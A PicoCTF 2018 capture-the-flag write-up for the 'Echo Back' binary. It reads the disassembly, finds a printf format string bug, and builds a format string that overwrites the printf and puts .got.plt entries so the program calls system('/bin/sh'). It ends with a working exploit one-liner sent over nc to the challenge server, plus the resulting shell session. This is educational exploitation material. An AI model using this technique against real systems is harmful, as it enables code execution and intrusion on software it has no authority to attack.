PicoCTF 2018 - Echo Back
Note: This article is part of our PicoCTF 2018 BinExp Guide.
Spot the Bug
Bad news this time around: they haven’t given us any C code, only the binary. The good news: you ought to be pretty good at reading assembly code by now, so run objdump -M intel -S echoback and get to work.
Here’s the function preamble and setup:
vuln:
; Preamble, preserve ebp and edi, make room for 0x94 bytes on stack
push ebp
mov ebp,esp
; baseline stack = ebp - 0x98
push edi ; 4 bytes
sub esp,0x94 ; 0x94 bytes
; Hey, a stack canary!
mov eax,gs:0x14
mov DWORD PTR [ebp-0xc],eax
; Zero out 0x20 dwords (0x80 bytes) starting at ebp-0x8C
xor eax,eax
lea edx,[ebp-0x8c]
mov eax,0x0
mov ecx,0x20
mov edi,edx
rep stos DWORD PTR es:[edi],eax ; memset(buf, 0, 0x80)
Yup, that’s right. This time around we actually get to see a stack canary as emitted by the compiler. The reference value lives in the Thread Control Block (TCB) header, which is accessed relative to the GS segment register in the x86 SystemV ABI. Offset 0x14 contains a random value used for stack protection. It’s copied into a stack variable at the beginning of the function, and then verified again at the end. It’s unlikely we’ll be smashing any stacks today.
Now, we get a prompt for input:
sub esp,0xc
push 0x8048720 ; "echo input your message:"
call 8048460 <system@plt>
add esp,0x10
Ok, that’s weird. It creates a whole new process just to print a message to the screen. That’s not very efficient. However, it does mean that system() has been linked into the binary, which means that it has an existing thunk inside the program as well as an entry in the .got.plt table. You’ll use that to your advantage later.
Next up, we hit the actual bug:
sub esp,0x4
push 0x7f
lea eax,[ebp-0x8c] ; buf
push eax
push 0x0
call 8048410 <read@plt> ; read(0, buf, 0x7f)
add esp,0x10
sub esp,0xc
lea eax,[ebp-0x8c] ; buf
push eax
call 8048420 <printf@plt> ; printf(buf)
add esp,0x10
Did you catch it? It’s a read() of up to 0x7f bytes into a buffer, followed by a call to printf with that same buffer as the format string argument. Recall from echooo and authenticate that this is a format string vulnerability and is something you should absolutely not do.
What’s left?
sub esp,0xc
push 0x8048739 ; "\n"
call 8048450 <puts@plt>
add esp,0x10
sub esp,0xc
push 0x804873c ; "Thanks for sending the message!"
call 8048450 <puts@plt>
add esp,0x10
nop
; check the stack canary
mov eax,DWORD PTR [ebp-0xc]
xor eax,DWORD PTR gs:0x14
je 804863e <vuln+0x93>
call 8048430 <__stack_chk_fail@plt> ; call on fail
mov edi,DWORD PTR [ebp-0x4]
leave
ret
Two calls to puts() with hardcoded strings, followed by a verification of the stack canary.
Strategy
Let’s put together what we know:
- There is a read of up to 0x7f (127) bytes.
- Those bytes are passed directly into printf, which means we can use format strings to read (and write) to memory.
- system() is called by this binary, which means it has an existing thunk in the plt segment.
- checksec verifies that this binary uses Partial-RELRO, so the .got.plt table is writable. It is not compiled as a PIE, so the binary is loaded at a known fixed location in memory.
- The only string we control is the one passed to printf(). The strings passed to puts are not under our control (and are in read-only segments).
- Although we can leak them, the addresses of variables on the stack aren’t known to us beforehand, making it hard to directly “write” into the stack using the format string vulnerability.
At the end of the day we want to call system("/bin/sh"). To do this, we could modify the .got.plt table so that printf actually calls the thunk for system (which is something we can figure out the address of). We would choose printf because we control the string passed to it, and we can even have that string start with "/bin/sh\0" (including the null terminator). The problem is that, in order to change the .got.plt table, we need to use the printf vulnerability to do it. We have a chicken-and-egg problem: we need printf to first overwrite our table, but once we’ve done that, it’s too late to call printf() again (there’s only one call to printf in the binary).
What would be really nice is if we could somehow get two calls to vuln() to run: the first time to overwrite the .got.plt table so that printf is actually system, and the second time so that we can pass in /bin/sh as the argument.
I’m sure by this point the wheels are turning and you’ve identified a strategy. If you think you know where this is headed, connect with nc 2018shell.picoctf.com 37402 now.
Background Info
Firstly, what stack variables are there, and where is the start of the buffer relative to the call to printf?
Here’s what the stack should look like immediately before the printf call (but after the arguments have been pushed):
Start | End | Content |
---|---|---|
esp | esp+3 | &buf [4 bytes] (ptr to format string) |
esp+4 | esp+15 | alignment padding [12 bytes] |
esp+16 = baseline = ebp-0x98 | esp+27 = ebp-0x8D | other [12 bytes] |
ebp-0x8C | ebp-0x0D | char buf[0x80] |
The first 4 bytes are the pointer to the buffer. The next 12 bytes are unused. After that are 12 more bytes reserved in the preamble, followed by the contents of the buffer. That is, there are 24 bytes of padding between the format string pointer and the start of the buffer contents. If those bytes are read as hypothetical 4-byte values passed as additional arguments to printf, then there are 6 integer values that we don’t care about, and the start of the buffer corresponds to the 7th.
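The slot arithmetic above can be double-checked with a few lines of Python. This is only a sketch: the constant names are made up for illustration, and the offsets are the ones read off the disassembly earlier in this article.

```python
# Offsets read from the disassembly; the names are illustrative only.
WORD = 4                    # size of one 32-bit printf argument slot
FRAME_BELOW_EBP = 0x98      # push edi (4 bytes) + sub esp,0x94
BUF_BELOW_EBP = 0x8C        # buf starts at ebp-0x8c
CALL_SETUP = 0x0C + WORD    # sub esp,0xc + push eax right before call printf

# Distance from esp (where the format string pointer sits) to the start of buf.
buf_offset_from_esp = CALL_SETUP + (FRAME_BELOW_EBP - BUF_BELOW_EBP)

# printf treats esp+4 as argument 1, esp+8 as argument 2, and so on.
arg_index = buf_offset_from_esp // WORD

print(buf_offset_from_esp, arg_index)  # 28 7
```

The same calculation should carry over to other 32-bit cdecl binaries, as long as the frame offsets are re-read from their own disassembly.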
What about identifying some of the useful addresses in the binary? We know there is a thunk for system() in the .plt segment of our binary, and we know the .got.plt segment contains a writable table containing the resolved addresses for printf and puts inside libc.
$ objdump -j .plt -S echoback | grep system
08048460 <system@plt>:
$ objdump -R echoback | grep -E "printf|puts"
0804a010 R_386_JUMP_SLOT printf@GLIBC_2.0
0804a01c R_386_JUMP_SLOT puts@GLIBC_2.0
$ objdump -t echoback | grep vuln
080485ab g F .text 00000098 vuln
This means that the thunk (function) for system() in the .plt (code) segment of the binary is at the address 0x08048460. The entry in the .got.plt (data) segment corresponding with the resolved dynamic symbol for printf is at the address 0x0804a010, and the one for puts is at the address 0x0804a01c. Finally, the address of the vuln() function is 0x080485ab (you’ll see why we looked this up in a second).
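Because x86 is little-endian, any of these addresses that ends up embedded in the input has to appear least significant byte first. A minimal sketch of that conversion, using Python's struct module (the helper name p32 is a hypothetical convenience, not something from the challenge):

```python
import struct

# Addresses taken from the objdump output above.
SYSTEM_PLT = 0x08048460
PRINTF_GOT = 0x0804A010
PUTS_GOT = 0x0804A01C
VULN = 0x080485AB

def p32(value):
    """Pack a 32-bit value in little-endian byte order (hypothetical helper)."""
    return struct.pack("<I", value)

print(p32(PRINTF_GOT))  # b'\x10\xa0\x04\x08'
print(p32(PUTS_GOT))    # b'\x1c\xa0\x04\x08'
```

None of the four bytes in either table address is a null byte, so printf will not stop early when it encounters them at the start of a format string.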
Exploitation
Since we know that puts will be called after printf, what would happen if we overwrote its entry in the .got.plt table to instead call vuln()?
If we did that, then the whole function would start over again, giving us a second opportunity to pass in a string like "/bin/sh". To make that useful, we’d also want to overwrite the .got.plt entry for printf to point at the thunk for system, so that it would execute /bin/sh instead of printing it. That means we should do two separate writes into the .got.plt table:
Address | New Value |
---|---|
0x0804a010 | 0x08048460 (134,513,760 decimal) |
0x0804a01c | 0x080485ab (134,514,091 decimal) |
The first write replaces the libc address of printf with the thunk for system (which is at the address 0x08048460). The second write replaces the libc address of puts with the address for vuln() (0x080485ab). From that point forward, whenever puts() is called, vuln() would get called instead, and likewise system() will replace printf().
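To see why these two writes chain together, here is a toy model of the control flow. It is only a sketch: Python callables stand in for code addresses, a dict stands in for the writable .got.plt table, and the prompt printed through system() is left out. Every name in it is illustrative.

```python
# Toy model only: this does not touch real process memory.
calls = []                                  # log of what actually "ran"
PAYLOAD = b"<format string with two %n writes>"
inputs = [PAYLOAD, b"/bin/sh\0"]            # what read() would return, in order

def system(cmd):
    calls.append(("system", cmd.split(b"\0")[0]))

def libc_puts(s):
    calls.append(("puts", s))

def libc_printf(buf):
    calls.append(("printf", buf))
    if buf == PAYLOAD:                      # stand-in for the two %n writes
        got["printf"] = system
        got["puts"] = vuln

def vuln(*_ignored):                        # a stray puts argument is simply ignored
    if not inputs:                          # the real program would block in read()
        return
    buf = inputs.pop(0)
    got["printf"](buf)                      # every call goes through the table
    got["puts"](b"\n")
    got["puts"](b"Thanks for sending the message!")

got = {"printf": libc_printf, "puts": libc_puts}
vuln()
print(calls[-1])  # ('system', b'/bin/sh')
```

In this model the original puts never runs at all: the very first puts call after the overwrite re-enters vuln, and the second pass hands our next input straight to system.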
Before you construct your format string, recall:
- There is a POSIX extension to format strings [%<number>$] where you can specify a specific argument number and printf will index into the arguments it expects and use that specific one (NOTE: if you use it once, you have to use it for every argument).
- We already know from the “Background Info” section that the first 4 bytes of the input buffer are located at the same place as a hypothetical 7th integer-sized argument to the printf call. The next 4 bytes, by extension, are in the same place as the 8th integer argument.
- We also know that there is a special format string token, %n, that accepts a pointer to an integer and will actually write a value to that address indicating the number of bytes printed so far.
- We haven’t covered it yet, but you can specify a width specifier, as in "%10x", which specifies that the output value should be a minimum of 10 characters wide (and would add spacing as necessary to pad the output). "%010X" would do the same, but pad the hexadecimal integer output with 0s instead of spaces.
- Finally, we know the read() call used by the binary is expecting 0x7F bytes, which it will place into a 0x80 byte buffer initialized with 0s.
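Putting %n and the width specifier together, the padding needed before each %n is just the difference between the target value and the number of characters printed so far. A small sketch of that bookkeeping follows; the function name is hypothetical, and it assumes the string starts with two 4-byte addresses (8 characters of output) and that the targets are written in ascending order.

```python
def pad_widths(already_printed, targets):
    """Return the field width to print before each %n so that the running
    character count equals each target in turn (hypothetical helper)."""
    widths = []
    count = already_printed
    for target in targets:
        width = target - count
        # A %x field can print up to 8 hex digits for a 32-bit value even if
        # the requested width is smaller, so smaller widths are not reliable.
        if width < 8:
            raise ValueError("targets must ascend with a gap of at least 8")
        widths.append(width)
        count = target
    return widths

# Values to store: the system thunk first, then the address of vuln().
widths = pad_widths(8, [0x08048460, 0x080485AB])
print(widths)  # [134513752, 331]
```

Writing the smaller value first matters because the character count that %n stores can only grow as more output is produced.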
Now, the format string to do the appropriate writes to the .got.plt
table:
Format String Value | Description |
---|---|
"\x10\xa0\x04\x08" | little-endian address of printf entry in .got.plt (prints 4 chars) |
"\x1c\xa0\x04\x08" | little-endian address of puts entry in .got.plt (prints 4 chars) |
"%1$0134513752x" | print arg 1 as a hex value, padded with 0’s, so that it is 134,513,752 chars wide |
"%7$n" | write the # of chars printed so far (4 + 4 + 134,513,752 = 134,513,760 = 0x08048460) into the address pointed to by the 7th argument |
"%1$0331x" | print arg 1 as a hex value, padded with 0’s, so that it is 331 chars wide |
"%8$n" | write the # of chars printed so far (134,513,760 + 331 = 134,514,091 = 0x080485ab) into the address pointed to by the 8th argument |
<padding> | pad the format string out to be exactly 0x7f (127) bytes long |
The format string, without the padding, is 4 + 4 + 14 + 4 + 8 + 4 = 38 bytes, which means we should add 89 bytes of padding.
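The byte counts can be confirmed by assembling the string programmatically. The sketch below builds it as Python 3 bytes; the variable names are illustrative, and the padding character "U" is an arbitrary choice. Building bytes directly also sidesteps a Python 3 pitfall: with a UTF-8 locale, print() on a str containing "\xa0" emits the two-byte UTF-8 encoding of that character instead of the single raw byte.

```python
import struct

PRINTF_GOT = 0x0804A010     # .got.plt entry for printf
PUTS_GOT = 0x0804A01C       # .got.plt entry for puts
READ_SIZE = 0x7F            # maximum bytes consumed by one read() in vuln()

stage1 = (
    struct.pack("<I", PRINTF_GOT)     # becomes printf argument 7
    + struct.pack("<I", PUTS_GOT)     # becomes printf argument 8
    + b"%1$0134513752x%7$n"           # count reaches 0x08048460, stored via arg 7
    + b"%1$0331x%8$n"                 # count reaches 0x080485ab, stored via arg 8
)
unpadded_len = len(stage1)

# Pad so that the first read() consumes exactly this string and nothing more.
stage1 += b"U" * (READ_SIZE - unpadded_len)

# Input intended for the second pass through vuln().
stage2 = b"/bin/sh\0"

print(unpadded_len, len(stage1))  # 38 127
```

To emit the raw bytes from Python 3, sys.stdout.buffer.write(stage1 + stage2) can take the place of print().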
After the padding is finished, we expect the program to jump into vuln again, and start reading a new string. This time we want the buffer to start with "/bin/sh\0". Let’s put all of this together and try it out:
$ (python -c 'print("\x10\xa0\x04\x08\x1c\xa0\x04\x08%1$0134513752x%7$n%1$0331x%8$n" + "U"*89 + "/bin/sh\0")'; cat -) | nc 2018shell.picoctf.com 37402
<LOTS OF OUTPUT ...>
0000000ffa4ab8cUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUinput your message:
ls
echoback
echoback.c
flag.txt
xinet_startup.sh
cat flag.txt
picoCTF{===REDACTED===}
Just as in previous examples, we spawn a sub-shell to first print out the format string, and then start cat to echo stdin back to stdout. We pipe the combined output of both of these programs into the nc command, which is used to connect to the challenge binary on the shell server. When the program on the other end receives the input that we’ve generated, it will eventually call system("/bin/sh"), at which point cat will be listening on our end for user input and will echo it into the nc process, which in turn gets fed into the shell, giving us an interactive terminal.
Head back to the PicoCTF 2018 BinExp Guide to continue with the next challenge.